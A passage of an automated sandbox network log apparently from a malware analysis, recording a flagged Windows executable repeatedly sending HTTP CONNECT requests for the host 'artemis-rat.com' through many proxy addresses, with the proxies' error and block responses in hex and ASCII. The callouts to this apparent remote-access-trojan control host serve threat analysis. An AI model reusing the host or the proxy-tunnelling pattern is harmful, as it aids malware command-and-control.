                                              1411192.168.2.454262138.36.199.1441537284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.029645920 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1412192.168.2.45432538.162.3.24431287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.032846928 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:26.452887058 CET111INHTTP/1.1 407 Proxy Authentication Required
                                              Proxy-Authenticate: Basic realm=""
                                              Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                              Data Ascii: Proxy Authentication Required


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1413192.168.2.454280182.106.220.25290917284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.033354044 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.374074936 CET325INHTTP/1.1 400 Bad Request
                                              Server: nginx/1.12.1
                                              Date: Mon, 11 Mar 2024 07:37:24 GMT
                                              Content-Type: text/html
                                              Content-Length: 173
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.1</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1414192.168.2.45435235.237.210.21531287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.033427000 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:25.458353996 CET39INHTTP/1.1 200 Connection established


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1415192.168.2.454437172.67.38.96807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.033510923 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.188272953 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:24 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1416192.168.2.45434638.162.31.2731287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.033555031 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:26.464164019 CET111INHTTP/1.1 407 Proxy Authentication Required
                                              Proxy-Authenticate: Basic realm=""
                                              Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                              Data Ascii: Proxy Authentication Required


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1417192.168.2.454452173.245.49.27807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.034257889 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.189399004 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:24 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1418192.168.2.454456104.27.122.6807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.034385920 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.189172029 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:24 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1419192.168.2.454465104.19.217.219807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.034406900 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.189301014 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:24 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1420192.168.2.454476172.67.182.128807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.034531116 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.189512968 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:24 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1421192.168.2.45439752.189.35.880007284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.034540892 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.234894991 CET176INHTTP/1.1 404 Not Found
                                              Content-Type: text/plain; charset=utf-8
                                              X-Content-Type-Options: nosniff
                                              Date: Mon, 11 Mar 2024 07:37:24 GMT
                                              Content-Length: 19
                                              Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                                              Data Ascii: 404 page not found


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1422192.168.2.45430682.113.157.122312807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.035192013 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1423192.168.2.45438538.162.1.4431287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.035275936 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:26.461637974 CET111INHTTP/1.1 407 Proxy Authentication Required
                                              Proxy-Authenticate: Basic realm=""
                                              Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                              Data Ascii: Proxy Authentication Required


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1424192.168.2.45438738.162.21.1031287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.035321951 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:26.446297884 CET111INHTTP/1.1 407 Proxy Authentication Required
                                              Proxy-Authenticate: Basic realm=""
                                              Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                              Data Ascii: Proxy Authentication Required


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1425192.168.2.45431945.191.75.1869997284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.035543919 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.757180929 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:25.570355892 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:27.163927078 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1426192.168.2.45441438.162.9.16331287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.038024902 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:26.449759960 CET111INHTTP/1.1 407 Proxy Authentication Required
                                              Proxy-Authenticate: Basic realm=""
                                              Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                              Data Ascii: Proxy Authentication Required


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1427192.168.2.45443938.162.16.4231287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.046312094 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:26.461410999 CET111INHTTP/1.1 407 Proxy Authentication Required
                                              Proxy-Authenticate: Basic realm=""
                                              Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                              Data Ascii: Proxy Authentication Required


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1428192.168.2.454324147.161.166.35103267284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.046350002 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.335483074 CET1286INHTTP/1.1 403 Forbidden
                                              Content-Type: text/html
                                              Server: Zscaler/6.2
                                              Cache-Control: no-cache
                                              Access-Control-Allow-Origin: *
                                              Content-length: 13607
                                              Data Raw: 3c 21 2d 2d 23 20 49 64 3a 20 63 6c 6f 73 65 64 70 72 6f 78 79 2e 68 74 6d 6c 20 32 38 35 31 34 34 20 32 30 32 31 2d 30 36 2d 31 36 20 30 35 3a 30 32 3a 30 36 5a 20 73 7a 68 61 6e 67 20 2d 2d 3e 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 63 2e 6f 72 67 2f 54 52 2f 31 39 39 39 2f 52 45 43 2d 68 74 6d 6c 34 30 31 2d 31 39 39 39 31 32 32 34 2f 6c 6f 6f 73 65 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 5a 73 63 61 6c 65 72 20 6d 61 6b 65 73 20 74 68 65 20 69 6e 74 65 72 6e 65 74 20 73 61 66 65 20 66 6f 72 20 62 75 73 69 6e 65 73 73 65 73 20 62 79 20 70 72 6f 74 65 63 74 69 6e 67 20 74 68 65 69 72 20 65 6d 70 6c 6f 79 65 65 73 20 66 72 6f 6d 20 6d 61 6c 77 61 72 65 2c 20 76 69 72 75 73 65 73 2c 20 61 6e 64 20 6f 74 68 65 72 20 73 65 63 75 72 69 74 79 20 74 68 72 65 61 74 73 2e 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 3c 74 69 74 6c 65 3e 49 6e 74 65 72 6e 65 74 20 53 65 63 75 72 69 74 79 20 62 79 20 5a 73 63 61 6c 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 76 61 72 20 64 65 66 4c 61 6e 67 20 3d 20 27 65 6e 5f 55 53 27 3c 2f 73 63 72 69 70 74 3e 0a 3c 21 2d 2d 3c 69 6d 67 20 61 6c 74 3d 22 5a 73 63 61 6c 65 72 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 6c 6f 67 69 6e 2e 7a 73 63 61 6c 65 72 74 68 72 65 65 2e 6e 65 74 2f 69 6d 67 5f 6c 6f 67 6f 5f 6e 65 77 31 2e 70 6e 67 22 3e 2d 2d 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 62 6f 64 79 20 7b 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 33 65 33 65 33 3b 0a 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 0a 63 6f 6c 6f 72 3a 23 34 42 34 46 35 34 3b 0a 7d 0a 61 20 7b 0a 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 0a 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 0a 63 6f 6c 6f 72 3a 23 30 30 39 64 64 30 3b 0a 7d 0a 74 61 62 6c 65 20 7b 0a 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 70 78 3b 0a 7d 0a 74 64 20 74 61 62 6c 65 20 7b 0a 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 0a 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 0a 7d 0a 69 6d 67 20 7b 0a 6d 61 78 2d 68 65 69 67 68 74 3a 37 35 70 78 3b 0a 6d 61 78 2d 77 69 64 74 68 3a 34 33 30 70 78 3b 0a 7d 0a 2e 70 67 20 7b 0a 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 0a 74 6f 70 3a 30 3b 0a 62 6f 74 74 6f 6d 3a 30 3b 0a 6c 65 66 74 3a 30 3b 0a 72 69 67 68 74 3a 30 3b 0a 6f 76 65 72 66 6c 6f 77 2d 78 3a 68 69 64 64 65 6e 3b 0a 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 0a 7d 0a 2e 70 67 3a 62 65 66 6f 72 65 20 7b 0a 63 6f 6e 74 65 6e 74 3a 22 22 3b 0a 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 0a
                                              Data Ascii: ...# Id: closedproxy.html 285144 2021-06-16 05:02:06Z szhang --><!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd"><html><head><meta name="description" content="Zscaler makes the internet safe for businesses by protecting their employees from malware, viruses, and other security threats."><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta name="viewport" content="width=device-width, initial-scale=1"><title>Internet Security by Zscaler</title><script language="JavaScript">var defLang = 'en_US'</script>...<img alt="Zscaler" src="https://login.zscalerthree.net/img_logo_new1.png">--><style type="text/css">body {background-color:#e3e3e3;font-family:Arial, sans-serif;font-size:12px;color:#4B4F54;}a {cursor:pointer;text-decoration:none;color:#009dd0;}table {margin-top:10px;}td table {margin-top:0;text-align:center;}img {max-height:75px;max-width:430px;}.pg {position:absolute;top:0;bottom:0;left:0;right:0;overflow-x:hidden;white-space:nowrap;}.pg:before {content:"";display:inline-block;


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1429192.168.2.45445438.162.6.24631287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.049233913 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:26.475765944 CET111INHTTP/1.1 407 Proxy Authentication Required
                                              Proxy-Authenticate: Basic realm=""
                                              Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                              Data Ascii: Proxy Authentication Required


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1430192.168.2.454464154.205.152.9690807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.049285889 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Mar 11, 2024 08:37:24.554012060 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Mar 11, 2024 08:37:25.257461071 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Mar 11, 2024 08:37:26.659986973 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
